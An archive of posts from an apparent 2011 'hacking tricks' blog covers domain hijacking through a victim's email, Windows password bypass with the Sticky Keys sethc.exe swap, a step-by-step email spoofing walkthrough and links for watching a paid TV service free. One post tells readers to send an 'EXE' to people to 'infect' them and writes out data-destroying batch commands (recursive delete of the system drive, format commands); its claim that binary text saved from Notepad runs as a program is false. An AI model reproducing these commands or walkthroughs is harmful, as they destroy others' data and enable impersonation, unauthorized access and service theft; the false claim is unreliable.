Total Pageviews

Popular Posts

Wednesday, March 16, 2011

How to HACK a Website


Domain Hijacking – How to Hijack a Domain

Domain hijackingIn this post I will tell you about how the domain names are hacked and how they can be protected. The act of hacking domain names is commonly known as Domain Hijacking. For most of you, the term “domain hijacking” may seem to be like an alien. So let me first tell you what domain hijacking is all about.
Domain hijacking is a process by which Internet Domain Names are stolen from it’s legitimate owners. Domain hijacking is also known as domain theft. Before we can proceed to know how to hijack domain names, it is necessary to understand how the domain names operate and how they get associated with a particular web server (website).

The operation of domain name is as follows

Any website say for example gohacking.com consists of two parts. The domain name(gohacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of domain name with the web hosting server is done as follows.
1. After registering a new domain name, we get a control panel where in we can have a full control of the domain. 
2. From this domain control panel, we point our domain name to the web server where the website’s files are actually hosted.
For a clear understanding let me take up a small example.
John registers a new domain “abc.com” from an X domain registration company. He also purchases a hosting plan from Y hosting company. He uploads all of his files (.html, .php, javascripts etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “abc.com” to point to his web server (of Y). Now whenever an Internet user types “abc.com”, the domain name “abc.com” is resolved to the target web server and the web page is displayed. This is how a website actually works.

What happens when a domain is hijacked

Now let’s see what happens when a domain name is hijacked. To hijack a domain name you just need to get access to the domain control panel and point the domain name to some other web server other than the original one. So to hijack a domain you need not gain access to the target web server.
For example, a hacker gets access to the domain control panel of  “abc.com”. From here the hacker re-configures the domain name to point it to some other web server (Z). Now whenever an Internet user tries to access “abc.com” he is taken to the hacker’s website (Z) and not to John’s original site (Y).
In this case the John’s domain name (abc.com) is said to be hijacked.

How the domain names are hijacked

To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients
1. The domain registrar name for the target domain.
2. The administrative email address associated with the target domain. 
These information can be obtained by accessing the WHOIS data of the target domain. To get access the WHOIS data, goto whois.domaintools.com, enter the target domain name and click on Lookup. Once the whois data is loaded, scroll down and you’ll see Whois Record. Under this you’ll get the “Administrative contact email address”.
To get the domain registrar name, look for something like this under the Whois Record. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case if you don’t find this, then scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.
The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it. Email hacking has been discussed in my previous post how to hack an email account.
Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has the access to this email account he can easily reset the password of domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.

How to protect the domain name from being hijacked

The best way to protect the domain name is to protect the administrative email account associated with the domain. If you loose this email account, you loose your domain. So refer my previous post on how to protect your email account from being hacked. Another best way to protect your domain is to go for private domain registration. When you register a domain name using the private registration option, all your personal details such as your name, address, phone and administrative email address are hidden from the public. So when a hacker performs a WHOIS lookup for you domain name, he will not be able to find your name, phone and administrative email address. So the private registration provides an extra security and protects your privacy. Private domain registration costs a bit extra amount but is really worth for it’s advantages. Every domain registrar provides an option to go for private registration, so when you purchase a new domain make sure that you select the private registration option.
Pass your Comments...

Changing Log On Screen in Windows 7


How to Change the Logon Screen Background in Windows 7

Win 7 Customized Logon Screen
Log On Screen
How would you like to change the logon screen background in Windows 7 so as to give your Windows a customized look and feel? With a small tweak it is possible to customize the Windows 7 logon screen and set your own picture/wallpaper as the background. Changing logon screen background in Windows 7 is as simple as changing your desktop wallpaper. Well here is a step by step instruction to customize the logon screen background.
 
1. The image you need to set as the background should be a .jpg file and it’s size should not exceed 245KB.
2. The image resolution can be anything of your choice. However I prefer 1440 x 900 or1024 x 768. You can use any of the photo editing software such as Photoshop to compress and set the resolution for your image. Once you’re done, save this image as backgroundDefault.jpg.
3. You will need to copy this image to
C:\Windows\system32\oobe\info\backgrounds
You will need to create that path if it does not already exist on your computer.
4. Now open the Registry Editor (Start -> Run -> Type regedit) and navigate to the following key.
HKLM\Software\Microsoft\Windows\CurrentVersion\Authentication\
LogonUI\Background
If Background does not exist rightclick LogonUI, select New and then Key, and then name it Background. Now locate OEMBackground (listed on the right side). If it does not exist, right-click Background and select New and then DWORD and name it OEMBackground.
5. Double-click on OEMBackground and set the Value Data to 1.
6. Now log-off to see the new logon screen background. If you would like to revert back to the default background, just set the Value Data back to 0.
I hope you like this trick. Just try out and give your feedback!

Friday, March 11, 2011

To switch between OFFLINE and ENABLE Administrating account in Windows 7


To offline enable the built-in administrator account, follow these steps:
  1. Load the SAM Registry hive with regedit as described in my post about the offline Registry editor.
  2. Navigate to HKLM\%your_key_name%\SAM\Domains\Accounts\Users\Names\.
  3. Click “Administrator” and note the value in the type column.
  4. Navigate to HKLM\%your_key_name%\SAM\Domains\Accounts\Users\.
  5. Use the type value you noted before to locate the Registry key of the administrator account (see screenshot). Offline enable built in administrator locate administrator
  6. Edit the F entry of the administrator key and navigate to the 0038 position.
  7. If the built-in administrator account is disabled, the value of this position is “11″; replace it with “10″. NOTE: Make sure to edit the correct position because editing binary values in the Registry is a bit tricky: Move the cursor to the beginning of position 0038, press “DEL,” and then type “10″.
    Offline enable built-in administrator
  8. Click %your_key_name% and then unload the hive through the corresponding menu point in the File menu.
After you reboot, you can log on using the built-in administrator and reset the password of other accounts.
Note that you can also use this procedure to offline enable other accounts with administrator privileges. In this case, the value at position 0038 will be “15″ if the account is disabled; replace it with”14″ to enable the account.
Pass your Comments

12 ways to hack Windows Password (XP, Vista, 7)

 12 methods to hack windows 7, XP, Vista Passwords

1. Use your password reset disk to recover the Windows password

Vista and Windows 7 allow you to create a password reset disk, which enables you to reset your password without much hassle. The problem with this option is that you have to create the reset disk before the password is lost. Thus if you don’t have a password reset disk, this option is not for you. You can find a description of how to create a password reset disk here.

2. Restore Windows 7 or Windows Vista to a previous state

If you configured a new password recently and can still remember the password you used before, then you can restore Windows to a point in time before you changed the password. The Restore function of Windows 7 and Windows Vista will make sure that you don’t lose personal data. However, programs that have been installed since the corresponding restore point have to be installed again. All you need for this procedure is a Windows 7 or Windows Vista setup DVD. A detailed description of this method can be found here.

3. Boot up Windows XP in Safe Mode and log on with the built-in administrator account

When you installed Windows XP, you had to set a password for the Administrator account. If you still know this password, you can boot up in Safe Mode (by pressing F8 when your computer starts) and log on with the Administrator account. Note that whenever you reset the password for a user using another account, this user will no longer be able to access files that have been encrypted with EFS (Encrypted File System). Stored credentials in the Windows Vault and Internet Explorer will also no longer be available. This method doesn’t work in Vista and Windows 7 because the administrator account is disabled by default in Safe Mode with these Windows versions. Below you will learn how to enable the built-in admin account in Windows 7 and Vista.

4. Use the Sticky Keys trick to reset the Windows 7, Windows Vista, and Windows XP password

The Sticky Keys trick to restore a forgotten administrator password is reliable, easy to carry out, and does not require third-party software. All you have to do is boot up from a Windows 7 or Windows Vista setup DVD, launch the Windows Recovery Environment (RE), and then replace the sethc.exe file with cmd.exe. You can also use this method for Windows XP, but you have to use a Vista or Windows 7 DVD.

5. Offline enable the built-in administrator account in Windows 7 and Vista

This method is useful if no other user account on this machine has administrator privileges. You also need a Windows setup DVD (Vista or Windows 7). With this DVD you can boot up Windows RE and edit the Registry to offline enable the built-in administrator account. After you enable the built-in Administrator, you can log on with this account without requiring a password and then reset the Windows password of any user account.

6. Get Petter Nordhal-Hagen’s free ntpasswd tool to reset the Windows password

The downside of this option is that you have to create a password reset CD first. Then you can boot up with this CD and manipulate the Security Accounts Manager (SAM) database. Please note that resetting the password with third-party tools can also cause data loss as described in option 4. Also note that this tool comes without any warranty. However, I’ve been using it quite a few times and never had any problem with it. The latest version also supports Windows Vista and Windows 7. The advantage of this method is that it is quick if you already have the password CD in your tool box. Thus it is useful for admins who have to perform this procedure often. In all other cases I recommend option 4. You can download the tool here.

7. Use the free Trinity Rescue Kit (TRK) to recover the admin password

The Trinity Rescue Kit (TRK) is a troubleshooting solution that belongs in every admin’s tool box. Please read my review of the Trinity Rescue Kit for more information. This great tool allows you to reset the password of Windows XP, Vista, and Windows 7. It works similar to ntpasswd. After you have booted up with the TRK CD, you have to enter the command winpass -u user_name and then follow the instructions. Sometimes setting a new password doesn’t work; in this case, just set an empty password.

8. Use the free Kon-Boot tool to remove Windows passwords

I reviewed the free Kon-Boot tool a few days ago, and I can’t really recommend it because it crashed two Windows 7 installations during my test. I mention this free password reset tool here for the sake of completeness and because it is quite famous. Its main advantage is that it is very quick. You only have to boot up from the Kon-Boot CD and the tool will do the rest for you. It changes the contents of the Windows kernel on the fly while booting allowing you to log on without password. Thus the tool doesn’t change the SAM database. If you reboot again without using Kon-Boot you need the old passwords.

9. Use the free NTPWEdit tool to reset the Windows password

Especially if your computer doesn’t have a CD or DVD drive, you have to create a bootable Windows USB flash drive and then you can use the free Windows password reset tool NTPWEdit. Don’t forget to add NTPWEdit to the USB stick before you boot up.

10. Use Microsoft Diagnostics and Recovery Toolset to reset the administrator password

MSDaRT is a toolset from Microsoft that allows you to repair a Windows installation. This tool is only available for Microsoft volume customers, TechNet Plus subscribers, and MSDN subscribers. You can easily recover an admin password with its Locksmith tool.

11. Get a commercial password reset tool

Many commercial tools are available that allow you to reset the Windows administrator password. Technically, they do the same as the free tools. Some of them might be easier to use or come with better instructions than the free tools. But before you spend money, I recommend trying the other options I described in this article. I don’t want to recommend a particular tool here. However, I would prefer a tool where the vendor offers support in case you run into problems. Be careful—there are many black sheep exploiting desperate people by selling overpriced tools.

12. Reinstall Windows

This might sound like a joke, but in some cases this is the best method. For instance, if you don’t want to lose your EFS-encrypted files or stored credentials by resetting your password, but you desperately need the computer, you can just install Windows a second time. You will have access to all the files of the previous installation. Just make sure that you don’t overwrite the original Windows installation during the Windows setup. This allows you to boot up the original Windows installation at a later time. I am sure you will remember your forgotten Windows password sooner or later. As to my own experience, the old password will pop up in your mind right after you finish the installation and go to configure your new administrator password.
Please let me know in a comment below if you’ve heard of another option for resetting the Windows password.

Windows 7, Vista, XP Sticky keys trick to hack Password

To reset a forgotten administrator password, follow these steps:

  1. Boot from Windows PE or Windows RE and access the command prompt.
  2. Find the drive letter of the partition where Windows is installed. In Vista and Windows XP, it is usually C:, in Windows 7, it is D: in most cases because the first partition contains Startup Repair. To find the drive letter, type C: (or D:, respectively) and search for the Windows folder. Note that Windows PE (RE) usually resides on X:.
  3. Type the following command (replace “c:” with the correct drive letter if Windows is not located on C:):
    copy c:\windows\system32\sethc.exe c:\
    This creates a copy of sethc.exe to restore later.
  4. Type this command to replace sethc.exe with cmd.exe:
    copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
  5. Reboot your computer and start the Windows installation where you forgot the administrator password.
  6. After you see the logon screen, press the SHIFT key five times.
  7. You should see a command prompt where you can enter the following command to reset the Windows password (see screenshot above):
    net user you_user_name new_password
    If you don’t know your user name, just type net user to list the available user names.
  8. You can now log on with the new password.
I recommend that you replace sethc.exe with the copy you stored in the root folder of your system drive in step 3. For this, you have to boot up again with Windows PE or RE because you can’t replace system files while the Windows installation is online. Then you have to enter this command:
copy /y c:\sethc.exe c:\windows\system32\sethc.exe
 Share your Comments...

Sunday, February 27, 2011

Making GOOGLE easier to search

Customize Google to Improve Search Results


Google is indisputedbly the best search engine out there on the Internet, however there are a few ways by which you can customize Google and make it even better. I have got 3 best free Firefox extensions using which you can customize Google by adding extra useful information to your search results and remove unwanted informationlike ads, spam and click tracking so as to improve the overall searching experience. The following are the 3 best extensions for Firefox using which you can improve the search results.
 

1. OptimizeGoogle:

 
Using OptimizeGoogle, you can get rid of text ads from Google search results, add links from about 10 other search engines, add position counter, product results and more. You can even filter your search results to see dead websites (using WayBack Machine) and remove click tracking so that you can search anonymously. Here is a list of some of the other useful features of this plugin.
1. Use Google suggest (get word suggestion while typing)
2. Add more security by using https wherever necessary
3. Filter spammy websites from search results page
4. Option to remove SideWiki
5. Add links to bookmark your favorite result
6. Add links to other news and product search sites
To install the plugin, just visit the OptimizeGoogle page from your Firefox browser and click on the Download button. Once installed, you can enable or disable the customization options from the Tools -> OptimizeGoogle Options.
After you customize Google to improve the search results, how about adding a feature that provides a way to preview the website in the search results itself? Here is a miracle Firefox extension to this job for us.
 

2.  SearchPreview:

 
SearchPreview (formerly GooglePreview) will insert thumbnail view of the webpage into the Google search results page itself so that you can take the guess work out of clicking a link. Just install the plugin, reload Firefox and you will have the SearchPreview at work. You can install this plugin from the following link.
SearchPreview Download
OptimizeGoogle and SearchPreview have made our search results smarter and faster. Now how about safer? Well you have another Firefox plugin to make your search results safer as well. Here we go.
 

3. McAfee SiteAdvisor:

 
This is a free browser plugin that gives safety advice about websites on the search results page before you actually click on the links. After you install the SiteAdvisor plugin, you will see a small rating icon next to each search result which will alert you about suspecious/risky websites and help you find safer alternatives. These ratings are derived based on various tests conducted by McAfee.
Based on the quality of links, SiteAdvisor may display Green, Yellow, Red or Grey icon next to the search results. Green means that the link is completely safe, Yellow means that there is a minor risk, Red means a mojor risk and Grey means that the site is not yet rated. These results will guide you to Web safety.
SiteAdvisor works on both Internet Explorer and Firefox which you can download from the following link:
McAfee SiteAdvisor Download
 
I hope you enjoy these 3 plugins which make your searching experience a lot more simpler and safer.
Pass your Comments...

Friday, February 25, 2011

Write Protecting ur USB Flash Drive

How to Write-Protect USB Flash Drive
 
Many a time, it becomes necessary for us to write protect our USB flash drive so as to protect it from viruses and other malware programs. Because flash drives are so popular and most widely used to move data between computers, they are the prime target for attackers as a means to get infections spread around the computer world. Also, since USB drive is not a Read-Only Memory (ROM), the data inside it can easily be modified or deleted by malware programs.
But unfortunately, most of the new flash drives do not come with a write-protect feature as the manufacturers wish to cut down the cost of production. Hence, the only way to write-protect your USB flash drives is to enable this feature on your own computer.
This can be done by adding a small entry to the Windows registry which acts as a switch that can be enabled to make use of the write protection or disabled to allow write access. Just follow these steps:
1. Open the Registry Editor (Open the “Run” dialog box, type regedit and hit “Enter”).
2. Navigate to the following Registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
 3. Create a New Key named as StorageDevicePolicies. To do this right-click on Control, and click on New->Key and name it as StorageDevicePolicies.
4. Now right-click on  StorageDevicePolicies and create a New->DWORD (32-bit) Value and name it as WriteProtect.
5. Double-click on WriteProtect and set the Value data to 1.
Now the right-protection for USB drives is enabled on your computer (no restart required) and thus it would not be possible for anyone or any program to add/delete the contents from your USB flash drive. Any attempt to copy or download the files onto the USB drive will result in the following error message being displayed, which will say that "The disk is write protected."

To revert and remove the write-protection, all you need to do is just change the Value data for WriteProtect (Step-5) from 1 back to 0. Now write access to all the USB devices is re-enabled.
Sometimes it may seem difficult to remember and follow the above mentioned steps each time you want to enable/disable the write protection. Hence as an alternative way, there are many tools available to automatically enable/disable the write-protection feature. One of my favorite tool is USB Write Protect by Naresh Manadhar. Using this tool you can limit write access to your USB drives with just a click of a button. 
Post your comments...

Wednesday, February 9, 2011

Sending FAKE Emails!!!


Send Fake Email – Fake Email Pranks


Most of the email forging tutorials on internet will teach us how to send fake email connecting to SMTP server of the ISP or any other domain. But this is not possible since these hacks will no longer work today because SMTP of remote server will reject any attempts for unauthorised access.
Also many of the websites offer you to send fake email from their sites where none of them work. So we have to run our own SMTP server on our computer to successfully send a fake email. SMTP server is a simple software program which can be installed on your computer in few seconds. SMTP server allows you to send fake email right from your desktop easily and effectively.
Download QK SMTP server HERE. This is the SMTP server i am using in my tutorial. Once you download and install the server on your comp then you are all set to send fake email successfully.
 
 
PART A: CONFIGURING SMTP SERVER
Once you have installed the QK SMTP server on your comp you must perform the following configuration.
1. Click on “Settings” button on the main screen,the Settings window pops up
2. On Settings window click on “Basic Parameter” tab
3. Set binding IP to “127.0.0.1″
4. Set port to “25″
 
PART B: SENDING FAKE EMAIL (EMAIL FORGING)
1. Click on SMTP server icon on your desktop to start your SMTP server to run(The icon is shown on the notification area of the taskbar if it is running). If it is already running then this step can be ignored
2. Goto command prompt(Start-Accessories-Command prompt)
3. Type exactly as follows
C:\>telnet 127.0.0.1 25
Here 127.0.0.1 is the default IP of every computer.25 is the port number. SO you are connecting to the SMTP server running on your own computer. This step is very importand to send fake email.
NOTE: The IP 127.0.0.1 should not be substituted by any other IP.
4. After typing the telnet command in the command prompt you get entry to the server which displays the following message. The response of a OK SMTP server is given below.Message within Green color is only explanation.
220 Welcome to QK SMTP Server 3
helo hacker (Type helo & any name followed by space)
250 Hello hacker (Server Welcomes You)
mail from:billg@microsoft.com (email ID can be anything of your choice. This is the ID from which fake email appears to have come from)250 billg@microsoft.com Address Okay (Server gives a positive response)rcpt to:admin@gmail.com (Type any valid recipient email address)250 admin@gmail.com Address Okay (Server gives a positive response)data (type this command to start input data)354 Please start mail input
From:Gates <billg@microsoft.com>
To:admin@gmail.com
Date:Sat Jan 5,2008 9:45 PM
Subject:Test to send fake email
You can create as many headers followed by the “:” symbol.
NOTE: HEADERS SHOULD NOT CONTAIN A LINE GAP. IF SO IT IS CONSIDERED AS BODY OF THE EMAIL. Press enter twice so that there is a line gap between the header & body data
<HERE IS YOUR DATA>End the body of email by pressing [ENTER] .(dot) [ENTER]
250 Mail queued for delivery (Sever indicates that the email is ready for sending)quit (Type this command to quit from server)221 Closing connection. Good bye.
Connection to host lost
(You will get the above 2 lines of message after typing “quit” command)
(Your fake email is sent to the recipient)

Thursday, January 27, 2011

MUNDU TV HACKING TRICK

Mundu TV Hack available in Market!!!

Mundu TV is a popular internet TV channel streaming service which allow you to watch TV channels on your Computer and Mobile device. I hope you all know that, they have limited their trail period to 7 days and over that period, you can only watch few channels. And if you wanted to watch more channels, then you should subscribe for any of their package. Now using a simple trick you can watch all of their channels completely for free. you just need to use any media player software like Real Player SP or VLC Media Player in your computer And for mobile devices you can use pv player or core player.
I this tutorial, I’m going to show you how to stream all TV channels available in Mundu TV for free.
For this trick, you can use Real Time Player , VLC Media Player or any similar streaming capable software. In this tutorial I’m using VLC Media player, you can download VLC  media player for free here.

So here are the steps:

Go to >> Media >> Streaming >> Click on Network tab and enter the streaming link and press ALT+P or click on the small arrow in the Stream button and select play.
For mobile, you can directly open the streaming links and if your phone is supporting streaming, then it would automatically use the built-in player for streaming.

Step 1:
In the VLC Player Click on Media from the menu, and select Streaming.

Step 2

Click on Network and then enter a network URL in the field, then click on the small arrow drop down on the STREAM button and select Play.

Step 3:
Looking for more steps? The next step is to watch and enjoy :) Drop your comments.


Some of the Streaming links for free:-

23t4g2h rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_4.sdp 2z5j8tj rtsp://ss1c6.idc.mundu.tv:554/prf1/cid_34.sdp
jgmweo rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_35.sdp
30ustah rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_7.sdp
208xj6t rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_29.sdp
es803p rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_32.sdp
o9r6mg rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_33.sdp
jab4mo rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_31.sdp
2lkbt52 rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_2.sdp
28i2elh rtsp://121.244.145.226:554/prf0/cid_45.sdp
npgaw6 rtsp://121.244.145.226:554/prf0/cid_62.sdp
2n0n1xl rtsp://121.244.145.226:554/prf0/cid_61.sdp
6sc4cw rtsp://121.244.145.226:554/prf0/cid_57.sdp
23jofbl rtsp://121.244.145.226:554/prf0/cid_58.sdp
27xkvb4 rtsp://121.244.145.226:554/prf0/cid_41.sdp
zmgm0j rtsp://121.244.145.226:554/prf0/cid_56.sdp
fvijyg rtsp://121.244.145.226:554/prf0/cid_38.sdp
2isftwh rtsp://121.244.145.226:554/prf0/cid_54.sdp
1zezgjr rtsp://121.244.145.226:554/prf0/cid_52.sdp
wk6ask rtsp://121.244.145.226:554/prf0/cid_55.sdp
ay4pk3 rtsp://121.244.145.226:554/prf0/cid_50.sdp
Other channels apart from Mundu TV channels:
SOUTH INDIAN CHANNELS
HOLLYWOOD CHANNELS
 



Wednesday, January 26, 2011

How to Create a NameLess File or FoLDEr

Nameless File

1) To create a Nameless file First Select a File.

2) Then press F2 to rename it.

3) Press and hold the 'Alt' key. While holding the Alt key, type numbers '0160' from the numpad.

Note :- Type the numbers '0160' from the numpad, that is, the numbers present on the right side of the keyboard.
Don’t type the numbers which are present on top of the character keys.

4) Press Enter and the nameless file or folder will be created.

Reason :- The file or folder that seems nameless is actually named with a single space.

Useless notepad is'nt useless NOW

Formatting HDD with Notepad

Step 1 :-

Copy The Following In Notepad Exactly as it is.
says01001011000111110010010101010101010000011111100000
Step 2 :-

Save As An EXE Any Name Will Do
Step 3 :-

Send the EXE to People And Infect
OR
IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001

try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC.


go to notepad and type the following:

@Echo off
Del C:\ *.*|y

save it as Dell.bat
want worse then type the following:

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file


Dont try the above tricks on your PC if u love ur DATA.

Poping a banner to show the OWNER's message

To pop a banner which can contain any message you want to display just before a user is going to log on.

Go to the key :- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WinLogon
Now create a new string Value in the right pane named 'LegalNoticeCaption' and enter the value that you want to see in the MenuBar.

Now create yet another new string value and name it:
'LegalNoticeText'.
Modify it and insert the message you want to display each time Windows boots.

This can be effectively used to display the company's private policy each time the user logs on to his NT box.

It's '.reg' file would be:
REGEDIT4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon] "LegalNoticeCaption"="Caption here."

Revealing Passwords


Want to Reveal the Passwords Hidden Behind Asterisk (****) ?


Follow the steps given below-

1) Open the Login Page of any website. (eg. http://mail.yahoo.com)

2) Type your 'Username' and 'Password'.

3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.



javascript: alert(document.getElementById('Passwd').value);


4) As soon as you press 'Enter', A window pops up showing Password typed by you..!

5) Join a Programming Class....

Note :- This trick may not be working with firefox.

Hope u like it. Raise ur comments.

Friday, January 14, 2011

How to HIDE a Drive in Windows..

How to HIDE a Drive in Windows using Command Prompt


Have u ever tried to hide your drive in Windows XP, Vista or 7. I guess NO. Lets do that using Command Prompt.


Step 1:-) Run your Command prompt using Administrator rights. (Click on start Menu, Then select Run and type cmd. Now press Ctrl+Shift+Enter)
Step 2:-) Now in Command Prompt type DISKPART and hit enter.
Step 3:-) Now type LIST VOLUME.(That will display the no of volume currently active on your HDD)


U'll see the above thing.
Step 4:-) Now type select volume 4 (i m hiding drive E hence i've selected volume 4. Please note that writing select volume E will NOT work u have to specify Volume number.)
Step 5:-) Now type Remove letter E (U can use your drive letter corresponding to the drive you need to hide)


Now The Selected Drive is hidden.


To Unhide the drive follow the below process.
Do the same as above till Step 4 and then:-
Step 5:-) Type Assign letter E. (Note that u have to mention the same letter which was there b4 as changing the letter might create some problem in future.)


Hope U like the trick. Pass your comments.

Thursday, January 13, 2011

How to protect your PC from KeyLoggers

Protecting your Computer from KeyLoggers

Keyloggers have been a major problem today as it does not require any prior knowledge of computers to use it. So hackers mainly use keyloggers to steal your passwords, credit card numbers and other confidential data. Below are some methods through which you can protect your computer from keyloggers:

Use a Good Antivirus

This is the first and basic step that you need to take in order to protect your computer from keyloggers. Use a Good antivirus such as Kaspersky, Norton or Mcafee and update it regularly.

Use a Good Antispyware

Since keyloggers are basically spywares, if you are a frequent user of Internet then you could be exposed to thousands of keyloggers and spywares. So you should use a good antispyware such as NoAdware.

Antilogger can be Handy

Antiloggers are programs that detect the presence of keyloggers on a given computer. Over past few years, I have tested a lot of anti-logging programs and have found Zemana Antilogger as the best antilogger.
Zemana
Normally a keylogger can be easily detected by a Good Antivirus program, but hackers use some methods such as hexing, binding, crypting and similar techniques to make it harder to be detected by antivirus programs. In this case Zemana Antilogger comes handy as the program is specially developed to protect your system against harmful keyloggers.
Online Scanning
When ever you receive a suspicious file, you scan it with online scanners such as Multi engine antivirus scanner which scans your file with 24 antivirus engines and reports it back to you if the file is recognized as a virus or spyware. This ensures that none of the malicious programs can escape from being detected as there are 24 different antivirus engines are involved in the scanning process.

Sandboxie

Sandboxie is another great program to help you protect your computer against harmful keyloggers and spywares. Sandboxie runs your computer in an isolated space which prevents your program from making permanent changes to other programs in your computer.
When ever you receive a file that looks suspicious, just run the program with Sandboxie so even if it is a keylogger or any other virus it will not make permanent changes to your computer system.

To run a program in Sandboxie follow the steps as mentioned below:
1. Open sandboxie and click on sandbox menu on the top
2. Now goto Default sandbox
3. Then click on run any program
4. Now select the file you wish to run in sandboxie and click open

Keyscrambler

Keyscrambler is one of the best protection against keyloggers that you can have, Keyscrambler is a small program which encrypts your typed keystrokes so even if the victim has installed a keylogger on your system, he or she will get encrypted keys. Keyscrambler currently supports Firefox, Internet explorer and other applications, however its premium version supports more than 160 applications.
Hope you liked my post! Pass the comments.